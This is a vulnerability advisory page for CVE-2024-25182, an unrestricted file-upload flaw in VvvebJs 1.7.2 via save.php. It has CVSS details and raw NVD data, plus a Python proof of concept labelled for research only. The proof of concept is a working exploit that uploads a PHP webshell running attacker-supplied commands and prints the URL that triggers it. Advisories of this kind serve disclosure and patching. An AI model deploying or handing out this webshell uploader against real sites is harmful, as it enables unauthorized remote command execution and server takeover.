Security Vulnerability Report
中文
CVE-2024-25182 CVSS 9.8 CRITICAL

CVE-2024-25182

Published: 2025-12-29 21:15:40
Last Modified: 2026-01-02 22:15:43

Description

givanz VvvebJs 1.7.2 suffers from a File Upload vulnerability via save.php.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vvveb:vvvebjs:1.7.2:*:*:*:*:*:*:* - VULNERABLE
VvvebJs <= 1.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-25182 PoC - VvvebJs File Upload RCE # Target: VvvebJs <= 1.7.2 via save.php target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' upload_endpoint = f'{target_url}/save.php' # Prepare malicious PHP file (webshell) payload = '<?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?>' # Create multipart form data files = {'file': ('shell.php', payload, 'application/x-php')} try: print(f'[*] Sending exploit to {upload_endpoint}') response = requests.post(upload_endpoint, files=files, timeout=10) if response.status_code == 200: print('[+] File uploaded successfully!') print(f'[+] Access shell at: {target_url}/uploads/shell.php?cmd=whoami') else: print(f'[-] Upload failed with status: {response.status_code}') print(f'[-] Response: {response.text}') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-25182", "sourceIdentifier": "[email protected]", "published": "2025-12-29T21:15:40.157", "lastModified": "2026-01-02T22:15:43.363", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "givanz VvvebJs 1.7.2 suffers from a File Upload vulnerability via save.php."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vvveb:vvvebjs:1.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "00CE1B8B-C606-4F32-90B5-12910C726E0F"}]}]}], "references": [{"url": "https://gist.github.com/joaoviictorti/ff6220d8ed6df77a0420f4413a1d9b8d", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}